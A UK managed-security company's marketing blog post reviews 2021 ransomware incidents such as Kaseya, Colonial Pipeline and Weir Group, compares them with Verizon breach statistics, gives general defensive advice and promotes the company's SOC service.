Home / Blog / Ransomware / Lessons From Kaseya, REvil, and Other Recent Data Breaches: Is it Really ALL About Ransomware?

October 7, 2022

A cursory glance at the media in 2021 tells us all we need to know about recent data breaches.

Today, organisations need to be concerned about ransomware… and that’s about it.

But does that tell the whole story? Let’s find out.

: The Main Cause of Recent Data Breaches?

There’s nothing new about ransomware.

From its inception as the AIDS trojan in 1989 to the first variants of ‘modern’ ransomware in the early 2000s, ransomware has plagued organisations for decades.

The birth of bitcoin in 2009 fuelled what we now call the ‘ransomware epidemic’. By 2010, there were more than 10,000 ransomware samples identified in the wild, and today it’s easily the most widely discussed cyber threat.

With so much attention in the media, you’d be forgiven for thinking it’s the only threat today’s organisations face. Consider some recent data breaches of 2021:

In March 2021, Taiwanese computer and electronics manufacturer Acer was hit by an affiliate of ransomware group REvil, who demanded a record-breaking (at the time) $50 million ransom payment in exchange for a decryption program, vulnerability report, and the deletion of stolen files.

In May 2021, U.S. fuel pipeline operator Colonial Pipeline—which provides roughly 45% of all fuel to the East Coast—was forced to shut down operations after being infected with DarkSide ransomware. The company opted to pay the $4.4 million ransom within hours of the attack, but the decryptor provided was so slow that the company opted to recover from its backups. But it hardly mattered. The pipeline couldn’t reopen for five days, during which panic buying of fuel reached such heights the president was forced to declare a state of emergency. He temporarily removed limits on the transport of fuel by road and signed a new executive order to enforce higher security standards for software sold to government departments.

In July 2021, hundreds of managed service providers had ransomware deposited on their systems after a REvil ransomware affiliate breached software provider Kaseya. Kaseya stated it had not paid the $70 million ransom demanded and that it was able to develop a 100% effective decryption tool to help customers recover. It later transpired that a REvil coder had accidentally generated and released a universal decryption key. This mistake probably saved affected organisations hundreds of millions of dollars in combined ransoms and recovery costs.

In October 2021, UK jeweller Graff suffered a combined ransomware and data theft attack by Russian group Conti. 69,000 documents were leaked on the dark web in early November, including the personal information of celebrities, politicians, business magnates, and even members of the royal families of several Arab states. The group later apologised to those royal families and removed their data, possibly fearing retaliation.

These are just a handful of the barrage of media stories featuring ransomware attacks in 2021 against businesses, government organisations, schools, hospitals, telecommunications providers, and more. But does all this attention give a full picture of the threats today’s organisations face?

In a word: No.

Is It REALLY All About Ransomware?

If all we knew about cyber threats were what the media tells us, we’d assume that ransomware and supply chain attacks are pretty much the only threat today’s organisations face. But that’s… not true.

According to the Verizon 2021 Data Breach Investigations Report, ransomware accounts for around 5% of security incidents and 10% of security breaches. That’s a significant trend—but it leaves a lot of incidents and breaches unaccounted for.

Social engineering and basic web applications attacks are both more common than ransomware in terms of attacks and breaches. Meanwhile, Denial of Service (DoS) attacks account for almost half of all cyber attacks—and can be highly disruptive and costly—but 0% of security breaches because these attacks don’t affect records or files.

Finally, human errors like lost devices, misconfigurations, and sending data to the wrong locations causes a small proportion of security incidents but a disproportionately high number of breaches.

Threat Category% Incidents% Breaches
Social Engineering13%33%
Basic Web Application Attacks17%26%
Human Error7.5%18.5%
Denial of Service Attacks49%0%

Add that up, and you’ve got a significant discrepancy between what’s reported in the media and what organisations face in the real world.

Does that mean you shouldn’t be worried about ransomware? Absolutely not.

Ransomware attacks can be devastating. The media headlines we’ve all read are ample proof of that. However, organisations shouldn’t prepare for these attacks at the expense of protecting against other common threats.

How To Protect Against Common Cyber Threats

Based on the trends we’ve explored in recent data breaches, there are some obvious steps all organisations should take to protect against cyber threats and security breaches:

  • Consistently maintain foundational security controls like vulnerability and patch management, penetration testing, configuration management, etc.
  • Protect critical web-facing assets from DoS attacks.
  • Purchase tools that can detect the most common threats—i.e., web application attacks, malware (including ransomware), and phishing—and either prevent them at their source or immediately flag them for incident responders.
  • Train staff to follow IT and security protocols and detect common threats like social engineering, including phishing, fraudulent text and voice messages, and Business Email Compromise (BEC).

These controls will help organisations detect, prevent, and respond to all of the most common cyber threats… including ransomware.

Remember, ransomware doesn’t magically appear inside a network. It has to be planted there somehow—often using social engineering techniques like phishing or exploiting vulnerabilities or misconfigurations in common IT systems. As a result, controls designed to protect against those threats will also protect organisations against a high proportion of ransomware attacks.

Are these controls enough? No.

There is no combination of security tools, processes, and training that can identify and prevent 100% of threats. No matter how hard you try (or how much you spend), there will always be some attacks that circumvent your controls and affect your systems. At that point, two things are important:

  • Secure network design considerations like network segmentation and stringent access controls minimise the damage caused by successful or partially successful cyber attacks by limiting an attacker’s ability to ‘travel’ through a network, access sensitive assets, and perform privileged functions.
  • Rapid and effective response helps quickly identify and resolve security incidents—ideally before sensitive assets or information are damaged, encrypted, or stolen. 

These additional controls are necessary to minimise the damage, disruption, and cost of cyber attacks that successfully bypass your organisation’s defences.

In most cases, they will be enough to protect business continuity and keep costs to a minimum. In the event of serious or sophisticated threats, these controls can mean the difference between a minor disruption and a potentially existential threat.

What Does it Look Like When It’s Done Right?

Consider the recent case of Weir Group, one of Scotland’s largest engineering firms. The firm was hit with a sophisticated ransomware attack in September, leading to significant operational disruption. The firm estimates the direct cost of recovering from the incident at £5 million, while revenue slippage and overhead under-recoveries will lead to further losses of £20-35 million.

“Wait, didn’t you say this was a success story?!”

Yes. The story is a success for several reasons:

  • The firm’s security controls quickly identified the threat and performed as intended by shutting down and isolating all IT systems.
  • No personal or business-sensitive information was stolen or encrypted.
  • The firm’s security team meticulously removed all traces of the threat before bringing systems back online to ensure the infection was wholly eradicated.
  • The firm liaised with regulators and intelligence services throughout the incident to ensure it fully complied with the law.

Returning to our recommendations above, Weir had everything in place to minimise the damage caused by a sophisticated cyber threat: robust threat detection, a securely designed network, and effective incident response.

“If Weir Group did everything right, how come they’re on the hook for up to £40 million in costs?!”

Weir Group is a large engineering firm with complicated operations and supply chains. The overall cost of the incident may seem high, but it’s a fact of life for a firm like Weir—major operational disruptions are costly for businesses that rely on seamless distribution.

So the question isn’t, “why did it cost so much?” but rather, “How much more could it have cost if Weir hadn’t responded so effectively?”

It’s impossible to answer this question precisely. For an indication, we can look at some other large organisations that suffered major attacks and didn’t respond as effectively as Weir Group:

And it’s not just about quantifiable costs. Many organisations hit by ransomware attacks are never able to fully recover their digital systems or files. This creates ongoing challenges—and, most likely, costs—that are hard to quantify fully but are nonetheless felt keenly.

By responding quickly and decisively to a detected threat, Weir Group still faced up to £40 million in total costs and losses… but avoided a host of other costs such as:

  • Regulatory fines
  • Reputation damage
  • Longer service disruption and more lost revenue
  • More negative media attention

In all probability, Weir’s operations would have suffered a longer disruption had the ransomware attack infected its systems. Combine that with hefty regulatory fines and the potential for lost business, and it’s easy to imagine that £40 million turning into losses that would be hard to absorb.

Added to this, Weir Group has now demonstrated its ability to contain a serious cyber attack without endangering its customers. In a world where household names routinely show they can’t ensure this, Weir’s reputation as a trustworthy and reliable supplier should—and no doubt will—be improved by its effective response to this attack.

Protect Your Organisation from Cyber Attacks

Proactive response is one of the top factors in minimising the impact of security incidents. However, many organisations struggle to implement and maintain effective 24/7/365 incident response capabilities due to a lack of financial and human cybersecurity resources.

Securing your business against ransomware and other attacks is possible with the right combination of people, processes, and technology. Many of the latest software solutions provide a high level of threat protection and provide you with the visibility to detect and respond to attacks.

At CyberOne, we offer the UK’s most advanced managed SOC service, providing always-on detection and response from our award-winning Cyber Defence Centre in Milton Keynes. Benefits include:

  • World-class threat detection and response tailored to your unique network environment.
  • Cloud-native approach enables real-time monitoring of all users, devices, and applications.
  • True 24/7/365 coverage and comprehensive SLAs ensure full protection at all times.
  • We leverage up-to-the-minute threat intelligence to uncover even the latest cyber threats.
  • Get full threat visibility across your entire environment from a single, fully managed platform.

To find out how our Cyber Defence Centre could help protect your organisation—not just from ransomware, but from the full range of cyber threats—visit our website.